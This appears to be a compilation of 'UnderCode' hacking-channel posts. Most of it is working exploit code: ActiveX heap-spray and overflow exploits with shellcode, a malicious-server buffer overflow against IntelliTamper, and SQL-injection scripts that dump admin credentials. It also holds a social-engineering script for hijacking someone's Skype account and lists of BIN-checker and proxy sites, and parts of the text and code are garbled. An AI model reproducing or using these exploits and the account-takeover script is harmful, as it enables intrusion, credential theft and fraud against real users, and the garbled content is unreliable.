▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Terminal skills-:
twitter.com/undercodetc

1) Command: win + R win + D ctrl + P

2) Find “about” information and call IE. File, Open, C: \ WINDOWS \ system32 \ cmd.exe

3)XSS pop-up window calls IE. Such as <script> window.open (/ s /) </ script>

4) Text page, ctrl + P, printer.

5) Input method, virtual keyboard.

6) Press the four foot disorder may occur Start menu (in this order: left and right, lower left and right)

long press somewhere, will be out of the Properties dialog box

, double-click somewhere, there will be landing interface

7) deliberately enter the wrong does not meet the business logic Data, there is a certain probability to bypass

8) Find the picture, and then long press the picture. . The effect is equivalent to the right mouse button

in general, directly run the command line is almost impossible.

Flash pages, printers, and input methods are commonly used

@UnderCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE - Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
fb.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

🦑tested by undercode

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This is PoC exploit-cve -sql
T.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

. this is PoC exploit
*/

$host = $argv[1];
$path = $argv[2];
$prefix = "qsf_"; // this is default prefix

echo
".\n ( Remote SQL Injection Exploit\n.\n".
". homepage: http://xy.wordpress.com/\n".
".\n".
". usage: php ".$argv[0]." host path\n".
". php ".$argv[0]." localhost /\n\n";

if(empty($host)||empty($path))die('# wrong host or path..');

$post_data = "query=I-like-it&forums[]=2)//limit//0//UNION//SELECT//1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1//FROM//".$prefix."users//WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";

$data = "POST ".$path."index.php?a=search HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-Type: application/x-www-undercodetest-urlencoded\r\n";
$data .= "Content-length: ".strlen($post_data)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $post_data."\r\n\r\n";

$s = @fsockopen($host, 80);
if (empty($s)) die('# wrong host..');

fputs($s, $data); $retu ='';

while(!feof($s)){
$retu .= fgets($s);
}

fclose($s);

$tmp = explode('[:!:]',$retu);
if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');
echo " " . $tmp[1] . "\n\ndone.";
?>
@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some good bin checkers websites:

> https://www.bincodes.com/bin-checker/

> https://binlist.net/

>https://binchecker.com/

>https://ccbins.pro/

>https://bin-checker.net/

>https://bincheck.org/

🦑Popular & recommended one
@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 someone ask, How to Easily Master Format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Safety Hard Reset?
if fond this gd article as a solution :
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

A) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Software Menu:

1) Make sure the battery is charge properly

2) Turn on SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) smartphone

3) Don’t forget to backup all important data

4) Go to menu: Setting > Backup & reset > Factory Data Reset > Reset Phone

5) Choose Erase everything to continue and confirm you ready to do the format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

6) The SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) will continue the step until ready to use in clean factory default.

B) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Flashtool applications:

1) Flashtool in the applications from Sony can be download from Sony website.

2) Flashtool software need to installed in you computer and ready with USB data cable

3) Make sure SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) battery is charge properly or full charge

4) Power off SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

5) Boot SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to

6) flashmode with using: Volume Down Button and connect to USB cable at No.1 above

7) Follow the menu at you computer display, it is easy to understand the steps.

C) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Hardware Key Button:

1) Make sure the battery fully charge

2) Do not forget to backup all important data

3) Turn off the SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

4) Press and Hold together: Power Button + Volume Up Button for several seconds

5) Follow the menu at LCD screen to continue the hard reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

D) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with PC Companion Software from Computer

1) Please Make Sure the Battery not Empty

2) PC Companion is default applications for Sony Smartphone which can be download from Sony Website

3) After install at our computer, open PC Companion Applications
Before connect to phone, please choose Phone Update and follow several step at PC Companion

4) At some menu, PC Companion will tell us how to connect the phone with PC Companion using USB cable and press the Volume Down button

5) Finish the PC Companion step and until it doing Factory Reset to SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to factory default Android operating system.

@undercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The most classic hacking tutorial (security skills) by UnderCode :
t.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The behavior of hackers mainly includes the following :

1) Learning technology:
　　Once new technologies appear on the Internet, hackers must learn immediately and master the technology in the shortest time. The mastering here is not general understanding, but Read the relevant "RFC" and understand the mechanism of this technology. Otherwise, if you stop learning, then relying on what he has previously mastered, you will not be able to maintain his "hacker status" for more than a year.

　　The knowledge that junior hackers need to learn is more difficult, because they have no foundation, so they need to be exposed to a lot of basic content. However, today's Internet brings a lot of information to readers, which requires junior learners to choose: too Deep content may make learning difficult; too "fancy" content is not useful for learning hackers. Therefore, beginners should not be too greedy, they should try to find a book and their own complete textbooks, and study them step by step.

2) Masquerade:
　　Every act of a hacker will be recorded by the server, so the hacker must disguise himself so that the other party cannot distinguish his true identity. This requires skilled skills to masquerade his IP address, use springboards to evade tracking, and clean up records Disturb clues, avoid firewalls, and more.

　　Camouflage requires very good basic skills to achieve it. This is a "big game" for beginners, which means that it is impossible for beginners to learn camouflage in a short time, so I do not encourage beginners to use their own learning Knowledge attacks the network, otherwise, once your actions are revealed, you will eventually harm yourself.

　　If one day you become a real hacker, I also don't approve of your attack on the network. After all, the growth of a hacker is a learning, not a crime.

3) Vulnerability discovery:
　　Vulnerabilities are the most important information for hackers. Hackers must often learn from other people's discovered vulnerabilities, and strive to find unknown vulnerabilities by themselves, and find valuable and exploitable vulnerabilities from a large number of vulnerabilities for testing. , Of course, their ultimate goal is to destroy or patch this vulnerability through a vulnerability.

>　Hackers ’obsession with finding vulnerabilities is unthinkable. Their slogan says" break authority ". From time to time, hackers have proved this with their actual actions. There is no" no Vulnerable "program. In the eyes of a hacker, the so-called "seamless" is simply "not found".

4) Exploiting loopholes:
　　For decent hackers, the loopholes need to be patched; for evil hackers, the loopholes are used for sabotage. And their basic premise is to "exploit vulnerabilities". Hackers can use vulnerabilities to do the following things:
　　
1) Obtain system information: Some vulnerabilities can leak system information and expose sensitive information, thereby further invading the system;
　　
2) Invading the system: entering through vulnerabilities Inside the system, or get the internal data on the server, or completely control the server;
　　
3) Find the next target: A victory means the emergence of the next target, and a hacker should make full use of the server that he already controls as a tool to find and invade the next System;
　　
4) Do some good things: After the decent hackers finish the above work, they will fix the vulnerabilities or notify the system administrator to
　　do some things to maintain network security; 5. Do some bad things: the evil hackers are doing the above work Later, it will be judged whether the server still has utilization value. If there is use value, they will implant Trojans or backdoors on the server for the next visit; and they will never show mercy to servers that have no use value, and the system crash will make them feel unlimited pleasure!

@UnderCodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑 From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.

A) 1) Learn a certain amount of English:
　　Learning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.

2) Learn to use basic software:
　　The basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.

3) Preliminary understanding of network protocols and working principles: The
　　so-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.

4) Familiar with several popular programming languages ​​and scripts:
　　As mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ​​and know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ​​Initially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ​​Contact, so long as you are proficient in one of them, other languages ​​can be the same, it is recommended to learn C language and htm hypertext language.

B) 1) Familiar with network applications:
　　Network applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>Mental faculties

>Skype

>Quick-thinking

>Social Skills (Minimum hard work required)

🦑 Process

1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;

2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account

3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.

4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.

5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;

🦑6) web page link

Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.

7) Transcript

Daring = Skype |Italics = Me personally

“Hi I have ignored my private data regarding my Skype bank account! ”

“Oh, My partner and i see. I’d always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? ”

“My Skype title is usually ‘bob’ in addition to la and orange county bob”

“Thank anyone.

🦑 So that you can assist you We need you to definitely supply the using details:

1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances list”

1) “ Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5”

“Thank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? ”

“Sure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recall”

“Thank anyone make sure you reset to zero your own private data in this article; link”

“I don’t have access to in which mail any longer that’s exactly why I’m getting in contact with you”

“What can be your new email address contact info? ”

“It’s Bob@bobber. bob”

“Thank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? ”

“Thanks greatly, Zero that’s alright l8rs: )”

Transcript Conclude

Right now this can seem to be a good practice nonetheless it isn't and yes it generally builds up an actual individual interconnection concerning anyone plus the particular person you're talking too, with good signals, good grammar in addition to using recommendations meticulously there is certainly virtually any 99% potential for anyone having this.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.

Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.

by Wojciech Pawlikowski (wojtekp@gmail.com)
/

#include <sys/types.h>
#include <sys/socket.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll

/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */

unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";

int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}

serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}

if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}

listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);

printf("[*] Waiting for a connection...\n");

while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}

printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));

read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);

for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;

for (i = 0; i < 1536; i )
overflow[i] = NOP;

memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer

i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);

write(cli_sock, req, strlen(req));

printf("[ ] Exploit sent!\n");

close(cli_sock);
}

close(sockfd);
}

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
pinterest.com/undercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Best http proxy list sites:

http://www.proxyserverlist24.top/?m=1

http://www.httptunnel.ge/ProxyListForFree/aspx

http://spys.one/en/http-proxy-list/

https://hidemyna.me/en/proxy-list/

https proxy list sites :

http://free-proxy.cz/fr/

https://www.proxynova.com/proxy-server-list/port-8080/

sock 4+5 proxy sites:

http://www.socksproxylist24.top/?m=

https://www.socks-proxy.net

https://sockslist.net

http://spys.one/en/socks-proxy-list/

http://www.gatherproxy.com/sockslist

https://www.sslproxies.org/

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma

🦑TESTED BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How improve android Ram 2020-Speedup 2020 by Undercode:
T.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Delete unused widgets (desktop tools) or try to avoid downloading software to the desktop as a shortcut:

2)Android 4.0 operating system , after downloading software by google app , it will automatically download new software to the desktop as a shortcut , which will consume RAM. In addition to deleting the rarely used desktop shortcuts by yourself , you can also remove the " Add icon to home screen " or " Automatically add gadgets " option in the settings of Google PLAY

3) Using the management application tool, view the programs occupying RAM space:

Use the Android phone's own application management tool to delete the less-used programs that occupy RAM space and free up RAM space. Operation method: "Settings"> "Applications"> "Running", and then will occupy large but less RAM The application stopped.

4) Use the phone's built-in software or download management tool to terminate the process and free up memory RAM space:

When the user keeps opening the page , the RAM space is easily occupied. At present, many brands of mobile phones provide tools to free up RAM space (such as the tool manager of SAMSUNG ..) , there are many similar management tools in Google Play (see here for details ) , you can easily close the opened page , free up RAM space Out.


5) Turn on virtual RAM via Swapper and place it on SD memory card

Android phones can use SWAPPER app to put virtual RAM on SD memory card after flashing. However , this will be part of the SD card space as a way of RAM , you must take the risk of brush machine , and a slower reading speed of virtual RAM and easy consumption, hot and let the phone SD reduction in life , basically not recommended.

6) Shut down and re-enable

In order to prevent unnecessary operation from consuming the storage space of the phone , it is recommended that the phone be turned off and on again from time to time.

🦑RAM (random access memory) random access memory (memory), which will lose its storage content when power is off, so it is mainly used to store programs used for a short time. The size of the RAM affects the loading speed and smoothness of the game. In addition, the operating system of Android 4.0 and above consumes 340MB of RAM . If the past 512MB of RAM is used , the lack of RAM is prone to cause the phone to run slowly or even crash. At present, most brands use 512MB of RAM for most mid- and low-end mobile phones based on cost considerations . Basically , it is not recommended to upgrade to Android 4.0 or higher operating system version .

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 cvs service-ViewCVS install Howto full by undercode
twitter.com/undercodenews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> ViewCVS is a software written in Python to view all data in the CVS code base. It has been used by many configuration management systems, and it is also a CVS auxiliary tool that can be selected in open source products like cvsweb.
Preparations before installation The

following software should already be installed on your system:

1) Python 1.5 or above, this one can also be installed, because ports will determine whether it is installed at compile time, if not installed it will automatically compile and Installed.

2) cvs, cvs is already built in FreeBSD, so don't worry.

3) mysql 3.22 and above, if you need viewcvs to store data into mysql, why should you install this software in advance. Note that this software is not required for viewcvs to run.

🦑 Installing ViewCVS

under FreeBSD Installing ViewCVS under FreeBSD is very simple, you can install via ports:

root @ ~ $ cd / usr / ports / devel / viewcvs /
root @ / usr / ports / devel / viewcvs $ make install; make Clean


1) ViewCVS is installed in the viewcvs-version directory in / usr / local (current version is 0.9.2).
Configure basic ViewCVS

2) Copy viewcvs.conf.dist from viewcvs into a copy called viewcvs.conf. This file is the main configuration file used by viewcvs. In this file, you need to set at least the following parameters:
# cvs_roots
# default_root
# rcs_path
# mime_types_file
cvs_roots settings

3) The original settings of cvs_roots in viewcvs.conf are:

cvs_roots =
Development: / home / cvsroot


4) We need to set all cvsroot for viewcvs to display One by one added to the list, the format is [CVSROOT name]: [CVSROOT path], the following is an example of my setting:

cvs_roots =
maven: / home /
cvsd / cvs / maven, hdsite: / home / cvsd / cvs / hdsite,
bsdhowto: / home / cvsd / cvs / bsdhowto


5) Here I set up three CVSRoots for viewcvs to see. Their names are maven, hdsite, bsdhowto. Note that the settings between each CVSRoot separated by commas
default_root

> default_root is used to set the default home page cvsroot project ViewCVS displayed.
rcs_path

6) The original setting of rcs_path in viewcvs.conf is not available:

#rcs_path = / usr / bin /


🦑 We can see that it has been commented out. If your rcs command is not in the / usr / bin directory, why not remove the comment? , Change to the path where rcs is located. Under FreeBSD, the default rcs is under / usr / bin, so this setting can be left unchanged.
mime_types_file

has no mime_types_file setting in viewcvs.conf:

#mime_types_file = /usr/local/apache/conf/mime.types


1) We can point it to Apache's mime setting, or we can write a new setting ourselves, I feel It is not used by the web server. It should be a configuration item used when running independently.
Other configuration of ViewCVS

